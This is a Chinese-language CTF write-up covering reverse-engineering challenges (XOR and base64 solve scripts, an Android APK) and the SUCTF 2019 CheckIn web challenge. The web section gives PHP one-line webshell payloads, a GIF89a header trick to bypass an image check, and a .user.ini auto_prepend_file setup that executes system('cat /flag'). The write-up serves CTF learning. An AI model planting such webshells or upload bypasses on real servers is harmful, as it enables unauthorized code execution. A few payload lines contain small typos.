目录
re
xor
helloword
reverse3
web
SUCTF 2019 CheckIn
xor
1.查壳
64位,无壳
2.ida,f5查看伪代码
3.跟进global
dq是八个字节,汇编数据类型参考汇编语言---基本数据类型_汇编db类型_wwb0111的博客-CSDN博客
4.因为global变量里有一部分16进制的整数和一部分的字符串,所以需要手工调整一下。得到global的值
shift+e提取出数据,转换成十六进制
5.写个脚本
key=[0x66,0x0A,0x6B,0x0C,0x77,0x26,0x4F,0x2E,0x40,0x11,0x78,0x0D,0x5A,0x3B,0x55,0x11,0x70,0x19,0x46,0x1F,0x76,0x22,0x4D,0x23,0x44,0x0E,0x67,0x06,0x68,0x0F,0x47,0x32,0x4F]
flag =''
for i in range(32,0,-1):
key[i]=(key[i]^key[i-1])
for i in range(33):
flag+=chr(key[i])
print(flag)
flag{QianQiuWanDai_YiTongJiangHu}
helloword
是一道安卓逆向题目
需要下载apkIDE
然后打开main函数,就找到flag
reverse3
1.查壳 32位无壳
2.shift+f12查看字符串
一个base64编码表,一个含有flag函数,base64编码原理及解码脚本参考一篇文章彻底弄懂Base64编码原理_程序新视界的博客-CSDN博客
3,查看main主函数
从下往上看
v5为Des(为了简洁后面把Destination叫为Des)的长度
strncmp(Destination,str2,v5)是把Destination与str2两字符串的前v5位数做一个比较,若Destination=str2,返回0;大于返回正数,小于返回负数
if(!strncmp(Destination,str2,v5))是一个判断语句
destination与str2如果相等,就会输出正确的flag
所以Str2为flag经过变换后的字符串,点进去看看
看上面
由一个函数得到的v4复制给destination
由一个函数得到的v4复制给destination,然后对destination做了一个for循环运算,此处为对destination做的一次变化。
变化为:假设Des长度为10,则第一次循环:Des[0]+0 第二次为:Des[1] +1
第22行的函数显然是输入函数,Str为你输入的flag,23行v3是flag的长度,然后关键点就在第24行的函数sub_4110BE对Str做的变换上,点进该函数查看是什么变换
继续点进去
看到"/3""和*4"猜测是base64对字符的二进制编码做的处理,这是定义了v9和v10来存放base64对字符的二进制变化;倘若不确定,继续往下看
一个if判断,两个循环while,switch(别的题目中也可能是for循环、do循环)结合前面的猜测实锤了函数是base64加密
然后正向总结一下思路:输入了一个Str字符串,然后对字符串做了一个base64加密,该加密的值赋给了v4,v4被赋给了Des,Des做了一个for循环,该循环对Des做了变化,最后倘若Des与Str2相等则输出正确的flag
所以写解密脚本思路为:将Str2逆向还原为Des,再对Des做base64解码
import base64
Des="e3nifIH9b_C@n@dH"
flag=""
for i in range(len(Des)):
flag+=chr(ord(Des[i])-i)
print(base64.b64decode(flag))
外包flag
SUCTF 2019 CheckIn
1 好像是一道文件上传题目,
上传一个php文件,里面写一个最简单的一句话木马
<?php eval(@$_POST['a']);?>
回显illegal suffix!(非法后缀)
这里尝试一下修改文件拓展名php5,phtml,等都没有成功。进行抓包,修改content-type,都是回显的illegal suffix!(非法后缀)
2.上传一张jpg
回显<? in contents! 说明不能有<?
那这里就清晰了,修改一下一句话木马使得一句话木马没有<?
<script language='php'>eval($_POST['a']);<scirpt>
回显exif_imagetype:not image!
这里使用exif_imagetype函数来判断是否是jpg文件,这里使用添加gif文件头GIF89a就能进行绕过
这里成功上传
3.尝试上传一个.htaccess文件将jpg文件变成php文件执行
这里在1.txt文件中写入
AddType application/x-httpd-php .jpg
4.在1.txt的文件中打开cmd,输入ren 1.txt .htaccess,这样来生成.htaccess
然后将.htaccess上传。回显exif_imagetype:not image!
说明不行。这里由于上传成功的时候会出现index.php,所以这里使用的是.user.ini
.user.ini
自PHP5.3.0起,PHP支持基于每个目录的.htaccess风格的IN/文件。此类文件仅被CGl /FastCGl SAPI处理。此功能使得PECL的 htscanner扩展作废。如果使用Apache,则用.htaccess文件有同样效果。
除了主php.ini 之外,PHP还会在每个目录下扫描INI文件,从被执行的PHP文件所在目录开始一直上升到web根目录($_SERVERL’DOCUMENT_RO0T’]所指定的)。如果被执行的PHP文件在web根目录之外,则只扫描该目录。
在.user.ini风格的INl文件中只有具有 PHP_INI_PERDIR和PHP_INI_USER模式的INI设置可被识别。
两个新的INI指令,user_ini.filename和user_ini.cache_ttl控制着用户INI文件的使用。
user_inifilename设定了 PHP会在每个目录下搜寻的文件名;如果设定为空字符串则PHP不会搜寻。默认值是.user.ini。user_ini.cache_ttl控制着重新读取用户INl文件的间隔时间。默认是300秒(5分钟)。
这里的意思就是说我们在.user.ini中设置php.ini中PHP_INI_PERDIR 和 PHP_INI_USER 模式的 INI 设置,只要是使用CGI/FastCGI模式的服务器都可以使用.user.ini
这里使用的是auto_prepend_file和auto_append_file
auto_prepend_file:指定一个文件,自动包含在要执行的文件前,类似于在文件前调用了require()函数。就是我们指定一个文件(比如teng.jpg),那么teng.jpg就会被包含在要执行的php文件中(比如index.php),就相当于在index.php中插入了一句require(./teng.jpg),不过需要注意的就是上传目录下必须要有可执行的php文件
auto_append_file:和auto_append_file类似,只是在文件后面包含,跟include()函数类似
他们的作用就是指定一个文件(3.jpg),那么该文件就会被包含在要执行的php文件中(index.php)。
5.先上传一个.user.ini
GIF89a
auto_prepend_file=3.jpg
6.上传一个图片马。文件名为3.jpg
GIF89a
<script language='php'>system('cat /flag');</script>
index.php通过配置文件.user.ini让index.php对3.jpg进行文件包含,3.jpg里面的内容就以php代码执行,于是getshell
auto_prepend_file是在文件前插入;auto_append_file在文件最后插入(当文件调用的有exit()
时该设置无效)
7.访问 /uploads/f9e1016a5cec370aae6a18d438dabfa5/index.php